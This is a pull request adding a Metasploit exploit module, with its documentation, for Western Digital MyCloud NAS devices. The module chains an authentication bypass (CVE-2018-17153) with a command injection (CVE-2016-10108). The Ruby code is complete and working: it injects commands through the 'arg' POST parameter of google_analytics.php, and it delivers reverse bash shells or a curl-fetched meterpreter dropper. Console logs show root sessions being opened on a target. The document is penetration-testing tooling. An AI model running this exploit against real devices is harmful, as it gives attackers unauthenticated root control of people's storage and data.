### PR TITLE
Add wd_mycloud_unauthenticated_cmd_injection module and docs (CVE-2016-10108 and CVE-2018-17153)

### DIFF
--- a/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md
@@ -1,0 +1,187 @@
+## Vulnerable Application
+This module exploits authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in
+Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remote code execution as the root user.
+
+The module first performs a check to see if the target is WD MyCloud.
+If so, it attempts to trigger an authentication bypass (CVE-2018-17153) via a crafted GET request to /cgi-bin/network_mgr.cgi.
+If the server responds as expected (with a 404 response), the module assesses the vulnerability status by attempting to exploit
+a commend injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command.
+This is done via a crafted POST request to /web/google_analytics.php where the command is injected into the `arg` POST parameter.
+
+If the server is vulnerable, the same command injection vector is leveraged to execute the payload.
+
+This module has been successfully tested against Western Digital MyCloud version 2.30.183.
+
+Note: based on the available disclosures, it seems that the command injection vector (CVE-2016-10108) might be exploitable
+without the authentication bypass (CVE-2018-17153) on versions before 2.21.126.
+The obtained results on 2.30.183 imply that the patch for CVE-2016-10108 did not actually remove
+the command injection vector, but only prevented unauthenticated access to it.
+However, since older versions will also be vulnerable to CVE-2018-17153, this module always chains exploits for both issues.
+
+- CVE-2016-10108 disclosure and PoC:
+https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
+
+- CVE-2018-17153 disclosure and Poc:
+https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/
+
+
+## Installation Information
+Western Digital no longer seems to offer older firmware versions for download to non-customers.
+[This commnity post](https://community.wd.com/t/wd-my-cloud-v3-x-v4-x-and-v2-x-firmware-versions-download-links/148533)
+contains download links to older firmware versions as well as to the source code, but only the links to the source code still work.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to WD MyCloud. The default value is `/`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Unix In-Memory
+1   Linux Dropper
+```
+
+## Scenarios
+### Western Digital MyCloud 2.30.183 - Unix In-Memory
+```
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to WD MyCloud
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
+   LPORT  6000             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.10.18:6000 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
+[*] 10.10.10.45:443 - Attempting to execute echo tLD1sR3mLQXV1AYFuHV46x5...
+[+] The target is vulnerable. The target executed the echo command.
+[*] 10.10.10.45:443 - Executing the payload. This may take a few seconds...
+[*] Command shell session 1 opened (10.10.10.18:6000 -> 10.10.10.45:45402) at 2023-07-26 13:51:06 +0000
+id
+uid=0(root) gid=0(root) groups=0(root)
+head /usr/local/config/config.xml
+<config>
+	<sw_ver_1>2.30.183</sw_ver_1>
+	<sw_ver_2>2.30.183.0116.2018</sw_ver_2>
+	<hw_ver>WDMyCloudEX4100</hw_ver>
+	<eula>1</eula>
+	<language>0</language>
+	<registered>0</registered>
+	<eula_fw>0</eula_fw>
+	<eula_apps>0</eula_apps>
+	<analytics>0</analytics>
+```
+### Western Digital MyCloud 2.30.183 - Linux Dropper
+```
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to WD MyCloud
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/armle/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
+   LPORT  6001             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.10.18:6001 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
+[*] 10.10.10.45:443 - Attempting to execute echo gkmp1ak8jprpqinbvmN84QXaWfgirEt...
+[+] The target is vulnerable. The target executed the echo command.
+[*] Using URL: http://10.10.10.18:8080/xFQRlaZ5ODY9ZQa
+[*] Client 10.10.10.45 (curl/7.42.1) requested /xFQRlaZ5ODY9ZQa
+[*] Sending payload to 10.10.10.45 (curl/7.42.1)
+[*] Sending stage (934728 bytes) to 10.10.10.45
+[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Meterpreter session 2 opened (10.10.10.18:6001 -> 10.10.10.45:43738) at 2023-07-26 13:51:59 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 10.10.10.45
+OS           :  (Linux 3.10.39)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+```

--- a/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb
+++ b/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb
@@ -1,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Western Digital MyCloud unauthenticated command injection',
+        'Description' => %q{
+          This module exploits authentication bypass (CVE-2018-17153) and
+          command injection (CVE-2016-10108) vulnerabilities in Western
+          Digital MyCloud before 2.30.196 in order to achieve
+          unauthenticated remote code execution as the root user.
+
+          The module first performs a check to see if the target is
+          WD MyCloud. If so, it attempts to trigger an authentication
+          bypass (CVE-2018-17153) via a crafted GET request to
+          /cgi-bin/network_mgr.cgi. If the server responds as expected,
+          the module assesses the vulnerability status by attempting to
+          exploit a commend injection vulnerability (CVE-2016-10108) in
+          order to print a random string via the echo command. This is
+          done via a crafted POST request to /web/google_analytics.php.
+
+          If the server is vulnerable, the same command injection vector
+          is leveraged to execute the payload.
+
+          This module has been successfully tested against Western Digital
+          MyCloud version 2.30.183.
+
+          Note: based on the available disclosures, it seems that the
+          command injection vector (CVE-2016-10108) might be exploitable
+          without the authentication bypass (CVE-2018-17153) on versions
+          before 2.21.126. The obtained results on 2.30.183 imply that
+          the patch for CVE-2016-10108 did not actually remove the command
+          injection vector, but only prevented unauthenticated access to it.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Erik Wynter', # @wyntererik - Metasploit
+          'Steven Campbell', # CVE-2016-10108 disclosure and PoC
+          'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC
+        ],
+        'References' => [
+          ['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.
+          ['CVE', '2018-17153'], # authentication bypass
+          ['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC
+          ['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Platform' => %w[linux unix],
+        'Arch' => [ ARCH_ARMLE, ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Linux Dropper', {
+              'Arch' => [ARCH_ARMLE],
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => :curl,
+                'Type' => :linux_dropper
+              }
+            }
+          ]
+        ],
+        'CmdStagerFlavor' => ['curl', 'wget'],
+        'Privileged' => true,
+        'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),
+    ])
+  end
+
+  def check
+    # sanity check to see if the target is likely WD MyCloud
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    return CheckCode::Unknown('Connection failed.') unless res
+
+    return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body =~ /var MODEL_ID = "WDMyCloud/
+
+    print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")
+    # try the authentication bypass (CVE-2018-17153)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),
+      'vars_get' => {
+        'cmd' => 'cgi_get_ipv6',
+        'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details
+      }
+    })
+
+    return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res
+
+    return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404
+
+    # send a command to print a random string via echo. if the target is vulnerable, both the command  and the command output will be part of the response body
+    echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"
+    print_status("Attempting to execute #{echo_cmd}...")
+    res = execute_command(echo_cmd, { 'wait_for_response' => true })
+
+    return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res
+
+    return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd)
+
+    CheckCode::Safe('The target failed to execute the echo command.')
+  end
+
+  def execute_command(cmd, opts = {})
+    request_hash = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),
+      'cookie' => 'username=admin',
+      'vars_post' => {
+        'cmd' => 'set',
+        'opt' => 'cloud-device-num',
+        'arg' => "0|echo `#{cmd}` #"
+      }
+    }
+
+    return send_request_cgi(request_hash) if opts['wait_for_response']
+
+    # if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response
+    send_request_cgi(request_hash, 0)
+  end
+
+  def exploit
+    if target.arch.first == ARCH_CMD
+      print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...")
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+end

--- a/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb
+++ b/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix In-Memory',
             {
-              'Platform' => 'unix',
+              'Platform' => [ 'unix', 'linux' ],
               'Arch' => ARCH_CMD,
               'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
               'Type' => :unix_memory
@@ -77,9 +77,9 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'DefaultOptions' => {
                 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
-                'CMDSTAGER::FLAVOR' => :curl,
-                'Type' => :linux_dropper
-              }
+                'CMDSTAGER::FLAVOR' => :curl
+              },
+              'Type' => :linux_dropper
             }
           ]
         ],
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Connection failed.') unless res
 
-    return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body =~ /var MODEL_ID = "WDMyCloud/
+    return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')
 
     print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")
     # try the authentication bypass (CVE-2018-17153)
@@ -128,12 +128,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # send a command to print a random string via echo. if the target is vulnerable, both the command  and the command output will be part of the response body
     echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"
-    print_status("Attempting to execute #{echo_cmd}...")
+    print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")
     res = execute_command(echo_cmd, { 'wait_for_response' => true })
 
     return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res
 
-    return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd)
+    return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')
 
     CheckCode::Safe('The target failed to execute the echo command.')
   end


### PR DESCRIPTION
## About
This change adds an exploit module for authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196.

## Vulnerable Application
Western Digital MyCloud before 2.30.196. The module has been tested against 2.30.183.
Some notes:
- Version 2.30.196 includes a patch for the authentication bypass (CVE-2018-17153). The command injection vector (CVE-2016-10108) should have been patched in 2.21.126, but I tested these issues against version 2.30.183 and discovered that CVE-2016-10108 was still exploitable there, but only after leveraging the authentication bypass. This implies that the patch for CVE-2016-10108 did not actually remove the command injection vector, but only prevented unauthenticated access to it.
- I was not able to test versions  older than 2.21.126, but based on the available disclosures, CVE-2016-10108 should be exploitable without CVE-2018-17153 on those versions. However, since older versions will also be vulnerable to CVE-2018-17153, this module always chains exploits for both issues.

For more info, see:
- https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ (CVE-2016-10108 disclosure and PoC)
- https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/ (CVE-2018-17153 disclosure and PoC)

## Target Information
I only have temporary access to the target and I haven't found a way to install a vulnerable target myself. Because of that, I will email a spool file to the msfdev team. This file has output from running the module with HTTPTRACE for both targets. I've taken this approach in the past, so I hope that is sufficient.

That being said, I did find [this](https://community.wd.com/t/wd-my-cloud-v3-x-v4-x-and-v2-x-firmware-versions-download-links/148533) post with download links for WD MyCloud versions, but the links to the firmware no longer seem to work. The links to the source code do work.

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection`
3. Do: `set RHOSTS [IP]`
4. Do: `set LHOST [IP]`
5. Do: `exploit`

## Options
### TARGETURI
The base path to WD MyCloud. The default value is `/`.

## Targets
```
Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper
```

## Scenarios
### Western Digital MyCloud 2.30.183 - Unix In-Memory
```
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to WD MyCloud
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:6000 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] Attempting to execute echo tLD1sR3mLQXV1AYFuHV46x5...
[+] The target is vulnerable. The target executed the echo command.
[*] 10.10.10.45:443 - Executing the payload. This may take a few seconds...
[*] Command shell session 1 opened (10.10.10.18:6000 -> 10.10.10.45:45402) at 2023-07-26 13:51:06 +0000
id
uid=0(root) gid=0(root) groups=0(root)
head /usr/local/config/config.xml
<config>
	<sw_ver_1>2.30.183</sw_ver_1>
	<sw_ver_2>2.30.183.0116.2018</sw_ver_2>
	<hw_ver>WDMyCloudEX4100</hw_ver>
	<eula>1</eula>
	<language>0</language>
	<registered>0</registered>
	<eula_fw>0</eula_fw>
	<eula_apps>0</eula_apps>
	<analytics>0</analytics>
```
### Western Digital MyCloud 2.30.183 - Linux Dropper
```
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to WD MyCloud
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/armle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
   LPORT  6001             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:6001 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] Attempting to execute echo gkmp1ak8jprpqinbvmN84QXaWfgirEt...
[+] The target is vulnerable. The target executed the echo command.
[*] Using URL: http://10.10.10.18:8080/xFQRlaZ5ODY9ZQa
[*] Client 10.10.10.45 (curl/7.42.1) requested /xFQRlaZ5ODY9ZQa
[*] Sending payload to 10.10.10.45 (curl/7.42.1)
[*] Sending stage (934728 bytes) to 10.10.10.45
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Meterpreter session 2 opened (10.10.10.18:6001 -> 10.10.10.45:43738) at 2023-07-26 13:51:59 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 10.10.10.45
OS           :  (Linux 3.10.39)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
```